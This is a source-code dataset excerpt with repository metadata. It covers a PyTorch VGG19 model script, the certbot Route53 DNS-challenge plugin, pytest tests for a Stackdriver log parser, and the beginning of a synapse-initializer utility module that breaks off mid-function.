            'conv1_1_relu' : torch.nn.ReLU(),
            'conv1_1_bn' : torch.nn.BatchNorm2d(64),
            'conv1_2' : torch.nn.Conv2d(64, 64, kernel_size=3, padding=1, stride=1),
            'conv1_2_relu' : torch.nn.ReLU(),
            'conv1_2_bn' : torch.nn.BatchNorm2d(64),
        }))
        # Block 2: 2 x conv3x3(128)
        self.conv2 = torch.nn.Sequential(OrderedDict({
            'conv2_1' : torch.nn.Conv2d(64, 128, kernel_size=3, padding=1, stride=1),
            'conv2_1_relu' : torch.nn.ReLU(),
            'conv2_1_bn' : torch.nn.BatchNorm2d(128),
            'conv2_2' : torch.nn.Conv2d(128, 128, kernel_size=3, padding=1, stride=1),
            'conv2_2_relu' : torch.nn.ReLU(),
            'conv2_2_bn' : torch.nn.BatchNorm2d(128),
        }))
        # Block 3: 4 x conv3x3(256)
        self.conv3 = torch.nn.Sequential(OrderedDict({
            'conv3_1' : torch.nn.Conv2d(128, 256, kernel_size=3, padding=1, stride=1),
            'conv3_1_relu' : torch.nn.ReLU(),
            'conv3_1_bn' : torch.nn.BatchNorm2d(256),
            'conv3_2' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_2_relu' : torch.nn.ReLU(),
            'conv3_2_bn' : torch.nn.BatchNorm2d(256),
            'conv3_3' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_3_relu' : torch.nn.ReLU(),
            'conv3_3_bn' : torch.nn.BatchNorm2d(256),
            'conv3_4' : torch.nn.Conv2d(256, 256, kernel_size=3, padding=1, stride=1),
            'conv3_4_relu' : torch.nn.ReLU(),
            'conv3_4_bn' : torch.nn.BatchNorm2d(256),
        }))
        # Block 4: 4 x conv3x3(512)
        self.conv4 = torch.nn.Sequential(OrderedDict({
            'conv4_1' : torch.nn.Conv2d(256, 512, kernel_size=3, padding=1, stride=1),
            'conv4_1_relu' : torch.nn.ReLU(),
            'conv4_1_bn' : torch.nn.BatchNorm2d(512),
            'conv4_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_2_relu' : torch.nn.ReLU(),
            'conv4_2_bn' : torch.nn.BatchNorm2d(512),
            'conv4_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_3_relu' : torch.nn.ReLU(),
            'conv4_3_bn' : torch.nn.BatchNorm2d(512),
            'conv4_4' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv4_4_relu' : torch.nn.ReLU(),
            'conv4_4_bn' : torch.nn.BatchNorm2d(512),
        }))
        # Block 5 -- see the class NOTE about the duplicated 'conv5_3' keys.
        self.conv5 = torch.nn.Sequential(OrderedDict({
            'conv5_1' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_1_relu' : torch.nn.ReLU(),
            'conv5_1_bn' : torch.nn.BatchNorm2d(512),
            'conv5_2' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_2_relu' : torch.nn.ReLU(),
            'conv5_2_bn' : torch.nn.BatchNorm2d(512),
            'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_3_relu' : torch.nn.ReLU(),
            'conv5_3_bn' : torch.nn.BatchNorm2d(512),
            'conv5_3' : torch.nn.Conv2d(512, 512, kernel_size=3, padding=1, stride=1),
            'conv5_3_relu' : torch.nn.ReLU(),
            'conv5_3_bn' : torch.nn.BatchNorm2d(512),
        }))
        # Classifier head: two hidden layers of 256 units with dropout.
        self.top = torch.nn.Sequential(OrderedDict({
            'Dense1' : torch.nn.Linear(512 * (cfg.INPUT_HEIGHT // 32) * (cfg.INPUT_WIDTH // 32), 256),
            'Dense1_relu' : torch.nn.ReLU(),
            'Dense1_dropout' : torch.nn.Dropout(p=0.5),
            'Dense2' : torch.nn.Linear(256, 256),
            'Dense2_relu' : torch.nn.ReLU(),
            'Dense2_dropout' : torch.nn.Dropout(p=0.5),
        }))
        self.fc_out = torch.nn.Linear(256, cfg.CLASS_NUM)
    def forward(self, x):
        # Five conv blocks, each followed by a 2x2 max pool (spatial /32).
        x = self.conv1(x)
        x = F.max_pool2d(x, 2, stride=2, padding=0)
        x = self.conv2(x)
        x = F.max_pool2d(x, 2, stride=2, padding=0)
        x = self.conv3(x)
        x = F.max_pool2d(x, 2, stride=2, padding=0)
        x = self.conv4(x)
        x = F.max_pool2d(x, 2, stride=2, padding=0)
        x = self.conv5(x)
        x = F.max_pool2d(x, 2, stride=2, padding=0)
        x = x.view(x.shape[0], -1)
        x = self.top(x)
        x = self.fc_out(x)
        # NOTE(review): see class docstring -- NLLLoss wants log_softmax here.
        x = F.softmax(x, dim=1)
        return x
if __name__ == '__main__':
    # Create the checkpoint directory, then hand off to the shared trainer.
    model_save_dir = '/'.join(cfg.MODEL_SAVE_PATH.split('/')[:-1])
    os.makedirs(model_save_dir, exist_ok=True)
    main(cfg, VGG19())
f71935de250e0719a42fab6dc8ca47d5eff65661 | 5,961 | py | Python | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 4 | 2020-04-09T21:57:23.000Z | 2020-04-11T13:26:54.000Z | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 32 | 2019-02-20T14:51:48.000Z | 2019-02-27T10:11:34.000Z | certbot-dns-route53/certbot_dns_route53/dns_route53.py | tsrivishnu/certbot | 81f02e5578819220e0b4e15a9ceca9b77fff436e | [
"Apache-2.0"
] | 3 | 2019-03-21T23:21:38.000Z | 2020-06-23T20:56:56.000Z | """Certbot Route53 authenticator plugin."""
import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict # pylint: disable=unused-import, no-name-in-module
# Module-level logger for the plugin.
logger = logging.getLogger(__name__)
# Appended to AWS error messages so users can fix credential problems.
INSTRUCTIONS = (
    "To use certbot-dns-route53, configure credentials as described at "
    "https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials " # pylint: disable=line-too-long
    "and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
    """Route53 Authenticator
    This authenticator solves a DNS01 challenge by uploading the answer to AWS
    Route53.
    """
    description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
                   "DNS).")
    ttl = 10
    def __init__(self, *args, **kwargs):
        """Create the boto3 Route53 client and the per-domain record tracker."""
        super(Authenticator, self).__init__(*args, **kwargs)
        self.r53 = boto3.client("route53")
        # Tracks every TXT value we created per validation domain so cleanup
        # can UPSERT the remaining values instead of deleting the whole rrset
        # when several challenges share one name.
        self._resource_records = collections.defaultdict(list) # type: DefaultDict[str, List[Dict[str, str]]]
    def more_info(self): # pylint: disable=missing-docstring,no-self-use
        return "Solve a DNS01 challenge using AWS Route53"
    def _setup_credentials(self):
        # boto3 discovers credentials itself (env vars, config file, role).
        pass
    def _perform(self, domain, validation_domain_name, validation): # pylint: disable=missing-docstring
        # Unused: perform() below batches all challenges in one pass instead.
        pass
    def perform(self, achalls):
        """Upsert one TXT record per challenge, then wait for propagation.

        Raises:
            errors.PluginError: When AWS credentials are missing/invalid or a
                Route53 API call fails.
        """
        self._attempt_cleanup = True
        try:
            change_ids = [
                self._change_txt_record("UPSERT",
                                        achall.validation_domain_name(achall.domain),
                                        achall.validation(achall.account_key))
                for achall in achalls
            ]
            for change_id in change_ids:
                self._wait_for_change(change_id)
        except (NoCredentialsError, ClientError) as e:
            logger.debug('Encountered error during perform: %s', e, exc_info=True)
            raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
        return [achall.response(achall.account_key) for achall in achalls]
    def _cleanup(self, domain, validation_domain_name, validation):
        """Best-effort removal of the TXT record; AWS errors are only logged."""
        try:
            self._change_txt_record("DELETE", validation_domain_name, validation)
        except (NoCredentialsError, ClientError) as e:
            logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
    def _find_zone_id_for_domain(self, domain):
        """Find the zone id responsible a given FQDN.
        That is, the id for the zone whose name is the longest parent of the
        domain.
        """
        paginator = self.r53.get_paginator("list_hosted_zones")
        zones = []
        target_labels = domain.rstrip(".").split(".")
        for page in paginator.paginate():
            for zone in page["HostedZones"]:
                if zone["Config"]["PrivateZone"]:
                    # DNS01 validation needs a publicly resolvable record.
                    continue
                candidate_labels = zone["Name"].rstrip(".").split(".")
                if candidate_labels == target_labels[-len(candidate_labels):]:
                    zones.append((zone["Name"], zone["Id"]))
        if not zones:
            raise errors.PluginError(
                "Unable to find a Route53 hosted zone for {0}".format(domain)
            )
        # Order the zones that are suffixes for our desired to domain by
        # length, this puts them in an order like:
        # ["foo.bar.baz.com", "bar.baz.com", "baz.com", "com"]
        # And then we choose the first one, which will be the most specific.
        zones.sort(key=lambda z: len(z[0]), reverse=True)
        return zones[0][1]
    def _change_txt_record(self, action, validation_domain_name, validation):
        """Apply ``action`` ("UPSERT"/"DELETE") for one TXT validation value.

        Returns the Route53 change id so callers can poll for propagation.
        """
        zone_id = self._find_zone_id_for_domain(validation_domain_name)
        rrecords = self._resource_records[validation_domain_name]
        challenge = {"Value": '"{0}"'.format(validation)}
        if action == "DELETE":
            # Remove the record being deleted from the list of tracked records
            rrecords.remove(challenge)
            if rrecords:
                # Need to update instead, as we're not deleting the rrset
                action = "UPSERT"
            else:
                # Create a new list containing the record to use with DELETE
                rrecords = [challenge]
        else:
            rrecords.append(challenge)
        response = self.r53.change_resource_record_sets(
            HostedZoneId=zone_id,
            ChangeBatch={
                "Comment": "certbot-dns-route53 certificate validation " + action,
                "Changes": [
                    {
                        "Action": action,
                        "ResourceRecordSet": {
                            "Name": validation_domain_name,
                            "Type": "TXT",
                            "TTL": self.ttl,
                            "ResourceRecords": rrecords,
                        }
                    }
                ]
            }
        )
        return response["ChangeInfo"]["Id"]
    def _wait_for_change(self, change_id):
        """Wait for a change to be propagated to all Route53 DNS servers.
        https://docs.aws.amazon.com/Route53/latest/APIReference/API_GetChange.html
        """
        # Poll every 5 seconds, for up to 10 minutes, before giving up.
        for unused_n in range(0, 120):
            response = self.r53.get_change(Id=change_id)
            if response["ChangeInfo"]["Status"] == "INSYNC":
                return
            time.sleep(5)
        raise errors.PluginError(
            "Timed out waiting for Route53 change. Current status: %s" %
            response["ChangeInfo"]["Status"])
| 39.217105 | 146 | 0.610636 | import collections
import logging
import time
import boto3
import zope.interface
from botocore.exceptions import NoCredentialsError, ClientError
from certbot import errors
from certbot import interfaces
from certbot.plugins import dns_common
from acme.magic_typing import DefaultDict, List, Dict
# Module-level logger for the plugin.
logger = logging.getLogger(__name__)
# Appended to AWS error messages to point users at the boto3 credential docs.
INSTRUCTIONS = (
    "To use certbot-dns-route53, configure credentials as described at "
    "https://boto3.readthedocs.io/en/latest/guide/configuration.html#best-practices-for-configuring-credentials "
    "and add the necessary permissions for Route53 access.")
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(dns_common.DNSAuthenticator):
    """Solve DNS01 challenges by publishing TXT records in AWS Route53."""
    description = ("Obtain certificates using a DNS TXT record (if you are using AWS Route53 for "
                   "DNS).")
    ttl = 10
    def __init__(self, *args, **kwargs):
        # Route53 client plus a tracker of the TXT values created per domain.
        super(Authenticator, self).__init__(*args, **kwargs)
        self.r53 = boto3.client("route53")
        self._resource_records = collections.defaultdict(list)
    def more_info(self):
        """One-line plugin description shown by certbot."""
        return "Solve a DNS01 challenge using AWS Route53"
    def _setup_credentials(self):
        # boto3 resolves AWS credentials on its own (env, config, role).
        pass
    def _perform(self, domain, validation_domain_name, validation):
        # Unused: perform() below handles all challenges in one batch.
        pass
    def perform(self, achalls):
        """Upsert one TXT record per challenge and wait for propagation."""
        self._attempt_cleanup = True
        try:
            change_ids = [
                self._change_txt_record("UPSERT",
                                        achall.validation_domain_name(achall.domain),
                                        achall.validation(achall.account_key))
                for achall in achalls
            ]
            for change_id in change_ids:
                self._wait_for_change(change_id)
        except (NoCredentialsError, ClientError) as e:
            logger.debug('Encountered error during perform: %s', e, exc_info=True)
            raise errors.PluginError("\n".join([str(e), INSTRUCTIONS]))
        return [achall.response(achall.account_key) for achall in achalls]
    def _cleanup(self, domain, validation_domain_name, validation):
        """Best-effort TXT record removal; AWS errors are only logged."""
        try:
            self._change_txt_record("DELETE", validation_domain_name, validation)
        except (NoCredentialsError, ClientError) as e:
            logger.debug('Encountered error during cleanup: %s', e, exc_info=True)
    def _find_zone_id_for_domain(self, domain):
        """Return the id of the most specific public zone enclosing ``domain``."""
        paginator = self.r53.get_paginator("list_hosted_zones")
        zones = []
        target_labels = domain.rstrip(".").split(".")
        for page in paginator.paginate():
            for zone in page["HostedZones"]:
                if zone["Config"]["PrivateZone"]:
                    # DNS01 validation needs a publicly resolvable record.
                    continue
                candidate_labels = zone["Name"].rstrip(".").split(".")
                if candidate_labels == target_labels[-len(candidate_labels):]:
                    zones.append((zone["Name"], zone["Id"]))
        if not zones:
            raise errors.PluginError(
                "Unable to find a Route53 hosted zone for {0}".format(domain)
            )
        # Longest zone name first == most specific match first.
        zones.sort(key=lambda z: len(z[0]), reverse=True)
        return zones[0][1]
    def _change_txt_record(self, action, validation_domain_name, validation):
        """Apply ``action`` for one TXT value; return the Route53 change id."""
        zone_id = self._find_zone_id_for_domain(validation_domain_name)
        rrecords = self._resource_records[validation_domain_name]
        challenge = {"Value": '"{0}"'.format(validation)}
        if action == "DELETE":
            rrecords.remove(challenge)
            if rrecords:
                # Other tracked values remain in the rrset: update it instead.
                action = "UPSERT"
            else:
                # Create a new list containing the record to use with DELETE
                rrecords = [challenge]
        else:
            rrecords.append(challenge)
        response = self.r53.change_resource_record_sets(
            HostedZoneId=zone_id,
            ChangeBatch={
                "Comment": "certbot-dns-route53 certificate validation " + action,
                "Changes": [
                    {
                        "Action": action,
                        "ResourceRecordSet": {
                            "Name": validation_domain_name,
                            "Type": "TXT",
                            "TTL": self.ttl,
                            "ResourceRecords": rrecords,
                        }
                    }
                ]
            }
        )
        return response["ChangeInfo"]["Id"]
    def _wait_for_change(self, change_id):
        """Poll (up to 120 x 5s) until the Route53 change reports INSYNC."""
        for unused_n in range(0, 120):
            response = self.r53.get_change(Id=change_id)
            if response["ChangeInfo"]["Status"] == "INSYNC":
                return
            time.sleep(5)
        raise errors.PluginError(
            "Timed out waiting for Route53 change. Current status: %s" %
            response["ChangeInfo"]["Status"])
| true | true |
f7193608cbcf5a355487e2c77d44dfda695bddce | 5,728 | py | Python | tests/test_stackdriver_parser.py | cleardataeng/forseti-policy-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 11 | 2019-04-12T21:23:49.000Z | 2020-09-02T11:16:49.000Z | tests/test_stackdriver_parser.py | forseti-security/real-time-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 18 | 2019-04-09T16:23:03.000Z | 2021-04-26T14:25:17.000Z | tests/test_stackdriver_parser.py | forseti-security/forseti-policy-enforcer | 11eca7e7012759be2730297ef362708695885da7 | [
"Apache-2.0"
] | 11 | 2019-05-08T09:08:08.000Z | 2021-04-26T19:23:24.000Z | # Copyright 2019 The Forseti Real Time Enforcer Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
# Fake client credentials: enough to construct resource objects; the tests
# never make real API calls.
test_google_args = {
    'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
    """Load and parse a JSON fixture from the tests' ``data`` directory."""
    data_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')
    with open(os.path.join(data_dir, filename)) as f:
        return json.load(f)
# parameters for testing logs that should return a single asset
test_single_asset_log_params = [
    # filename, expected_resource_type, expected_operation_type, expected_resource_name
    ("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
    ("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
    ("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
    ("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
    ("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
    # CloudSQL logs are inconsistent. See https://issuetracker.google.com/issues/137629452
    ("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
    ("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
    ("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
    ("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
    ("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
    ("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
    ("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
    ("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
    ("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
    ("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
    ("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
    ("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
    ("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
    ("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
    ("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
    ("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
    ("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
# filename, expected number of assets extracted from the log entry
test_log_resource_count_params = [
    ("serviceusage-batchenable.json", 3),
    ("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
    "filename,expected_resource_type,expected_operation_type,expected_resource_name",
    test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
    """Each sample log parses to exactly one asset with the expected fields."""
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    assert len(assets) == 1
    asset_info = assets[0]
    # operation_type check intentionally disabled for now.
    assert asset_info['resource_type'] == expected_resource_type
    #assert asset_info['operation_type'] == expected_operation_type
    assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
    "filename,expected_resource_type,expected_operation_type,expected_resource_name",
    test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
    """Extracted asset info must be constructible into a GoogleAPIResource."""
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    asset_info = assets[0]
    # Raises if the data does not map onto a known GCP resource type.
    GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
    "filename,expected_resource_count",
    test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
    """A log entry naming several assets yields one record per asset.

    Removed the trailing ``asset_info = assets[0]`` -- a dead, unused
    copy-paste remnant from the single-asset test above.
    """
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    assert len(assets) == expected_resource_count
| 49.37931 | 138 | 0.752793 |
import json
import os
import pytest
from app.parsers.stackdriver import StackdriverParser
from google.oauth2.credentials import Credentials
from rpe.resources.gcp import GoogleAPIResource
# Fake credentials: enough to build clients; never used for real API calls.
test_google_args = {
    'credentials': Credentials(token='bogus'),
}
def get_test_data(filename):
    """Load and parse a JSON fixture from the tests' ``data`` directory."""
    p = os.path.join(
        os.path.dirname(os.path.abspath(__file__)),
        'data',
        filename,
    )
    with open(p) as f:
        return json.load(f)
# (filename, expected_resource_type, expected_operation_type, expected_resource_name)
test_single_asset_log_params = [
    ("app-engine-debug.json", "appengine.googleapis.com/Instance", "write", "aef-default-test-instance"),
    ("bq-ds-set-iam-policy.json", "bigquery.googleapis.com/Dataset", "write", "wooo"),
    ("bigtable-set-iam-policy.json", "bigtableadmin.googleapis.com/Instance", "write", "example-instance"),
    ("pubsub-subscription-set-iam-policy.json", "pubsub.googleapis.com/Subscription", "write", "test-subscription"),
    ("pubsub-topic-set-iam-policy.json", "pubsub.googleapis.com/Topic", "write", "test-topic"),
    ("cloudsql-resource.labels.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudsql-protoPayload.request.body.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudsql-protoPayload.request.resource.instanceName.instanceId.json", "sqladmin.googleapis.com/Instance", "write", "test-instance"),
    ("cloudfunctions-set-iam-policy.json", "cloudfunctions.googleapis.com/CloudFunction", "write", "example_function"),
    ("compute-subnetworks-enable-flow-logs.json", "compute.googleapis.com/Subnetwork", "write", "example"),
    ("compute-subnetworks-set-private-ip-google-access.json", "compute.googleapis.com/Subnetwork", "write", "example"),
    ("compute-firewalls-enable-logs-policy.json", "compute.googleapis.com/Firewall", "write", "test-firewall"),
    ("dataproc_createcluster.json", "dataproc.googleapis.com/Cluster", "write", "test-dataproc-cluster"),
    ("datafusion-create-instance.json", "datafusion.googleapis.com/Instance", "create", "test-instance"),
    ("datafusion-update-instance.json", "datafusion.googleapis.com/Instance", "write", "test-instance"),
    ("gke-cluster-update.json", "container.googleapis.com/Cluster", "write", "example-cluster"),
    ("gke-nodepool-set.json", "container.googleapis.com/NodePool", "write", "example-pool"),
    ("servicemanagement-enable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubeadsreach.googleapis.com"),
    ("servicemanagement-disable-service.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
    ("servicemanagement-activate-service.json", "serviceusage.googleapis.com/Service", "write", "calendar-json.googleapis.com"),
    ("servicemanagement-deactivate-service.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
    ("serviceusage-enable.json", "serviceusage.googleapis.com/Service", "write", "youtubereporting.googleapis.com"),
    ("serviceusage-disable.json", "serviceusage.googleapis.com/Service", "write", "zync.googleapis.com"),
    ("dataflow-job-step.json", "dataflow.googleapis.com/Job", "write", "job-id"),
    ("memorystore-redis.json", "redis.googleapis.com/Instance", "write", "test-instance"),
]
# (filename, expected number of assets extracted)
test_log_resource_count_params = [
    ("serviceusage-batchenable.json", 3),
    ("compute-hardened-images.json", 3),
]
@pytest.mark.parametrize(
    "filename,expected_resource_type,expected_operation_type,expected_resource_name",
    test_single_asset_log_params
)
def test_single_asset_log_messages(filename, expected_resource_type, expected_operation_type, expected_resource_name):
    """Each single-asset log fixture should parse into exactly one asset record."""
    # NOTE(review): expected_operation_type is parametrized but never asserted
    # here — confirm whether the parsed asset exposes it and add the check.
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    assert len(assets) == 1
    asset_info = assets[0]
    assert asset_info['resource_type'] == expected_resource_type
    assert asset_info['name'] == expected_resource_name
@pytest.mark.parametrize(
    "filename,expected_resource_type,expected_operation_type,expected_resource_name",
    test_single_asset_log_params
)
def test_rpe_from_stackdriver_data(filename, expected_resource_type, expected_operation_type, expected_resource_name):
    """Parsed asset info should construct a GoogleAPIResource without raising."""
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    asset_info = assets[0]
    # Smoke test: successful construction is the assertion (raises on bad data).
    GoogleAPIResource.from_resource_data(client_kwargs=test_google_args, **asset_info)
@pytest.mark.parametrize(
    "filename,expected_resource_count",
    test_log_resource_count_params
)
def test_log_resource_count(filename, expected_resource_count):
    """Logs that reference several resources should yield one asset per resource."""
    log_message = get_test_data(filename)
    assets = StackdriverParser._extract_asset_info(log_message)
    assert len(assets) == expected_resource_count
    # Removed a dead trailing `asset_info = assets[0]` assignment: the value
    # was never used and only obscured the test's intent.
| true | true |
f7193619bac808f3d98da51fdcf5aec8a4d3189e | 7,952 | py | Python | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 7 | 2021-06-15T05:54:29.000Z | 2022-02-21T06:57:06.000Z | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | null | null | null | blur/synapse_util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 5 | 2021-11-25T07:40:17.000Z | 2022-03-22T11:13:39.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
# Convenience aliases so APIs accept TF, NumPy or JAX values interchangeably.
# NOTE(review): `jp.array` is jax.numpy's constructor function, not a type;
# `jp.ndarray` is likely what was meant — harmless inside typing.Union.
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
  """Shape information handed to a SynapseInitializer."""
  shape: TensorShape  # full synapse tensor shape, e.g. (..., in+out+1, in+out+1, states)
  in_neurons: int  # number of input-side channels
  out_neurons: int  # number of output-side channels
class UpdateType(enum.Enum):
  """Which synapse direction(s) an operation applies to."""
  FORWARD = 1
  BACKWARD = 2
  BOTH = 3
  NONE = 4
# A callable that maps shape/channel metadata to an initialized synapse tensor.
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
  """Returns uniform random values in [-1, 1) with the given shape and seed."""
  centered = tf.random.uniform(shape, seed=seed) - 0.5
  return centered * 2
def random_initializer(start_seed=0, scale_by_channels=False,
                       scale=1, bias=0, random_fn=random_uniform_symmetric):
  """Returns initializer that generates random sequence.

  Args:
    start_seed: seed material; hashed into the starting RNG seed.
    scale_by_channels: if True, divide by sqrt(number of input channels).
    scale: constant scale, or a callable mapping params -> scale.
    bias: additive offset applied after scaling.
    random_fn: callable (shape, seed) -> tensor of raw random values.

  Returns:
    A SynapseInitializer; each call advances to the next seed in the sequence.
  """
  # One-element list so the nested impl() can mutate the seed between calls.
  # NOTE(review): hash(str(...)) depends on PYTHONHASHSEED, so the sequence is
  # not reproducible across processes unless that env var is fixed.
  seed = [hash(str(start_seed))]
  def impl(params):
    if len(params.shape) >= 3:
      # shape: species x (in+out) x (in+out) x states
      num_channels = int(params.shape[-2])
    seed[0] += 1
    v = random_fn(params.shape, seed[0])
    apply_scale = scale(params) if callable(scale) else scale
    r = v * apply_scale + bias
    # NOTE(review): num_channels is only bound when rank >= 3; calling with
    # scale_by_channels=True and a lower-rank shape raises NameError here.
    if scale_by_channels:
      r = r / (num_channels ** 0.5)
    return r
  return impl
def _random_uniform_fn(start_seed):
  """Returns shape -> tf.constant of U(-1, 1) draws from a private RNG state."""
  rng = np.random.RandomState(start_seed)
  def sample(shape):
    values = rng.uniform(low=-1, high=1, size=shape)
    return tf.constant(values, dtype=np.float32)
  return sample
def fixed_random_initializer(start_seed=0,
                             scale_by_channels=False,
                             scale=1,
                             bias=0,
                             random_fn=None):
  """Returns an initializer that generates random (but fixed) sequence.

  The resulting tensors are backed by a constant so they produce the same
  value across all calls.
  This initializer uses its own random state that is independent of default
  random sequence.

  Args:
    start_seed: initial seed passed to np.random.RandomState
    scale_by_channels: whether to scale by number of channels.
    scale: target scale (default: 1); may also be a callable params -> scale.
    bias: mean of the resulting distribution.
    random_fn: random generator; if None, uses _random_uniform_fn
  Returns:
    callable that accepts shape and returns tensorflow constant tensor.
  """
  if random_fn is None:
    random_fn = _random_uniform_fn(start_seed)
  def impl(params):
    if len(params.shape) >= 3:
      # shape: species x (in+out) x (in+out) x states
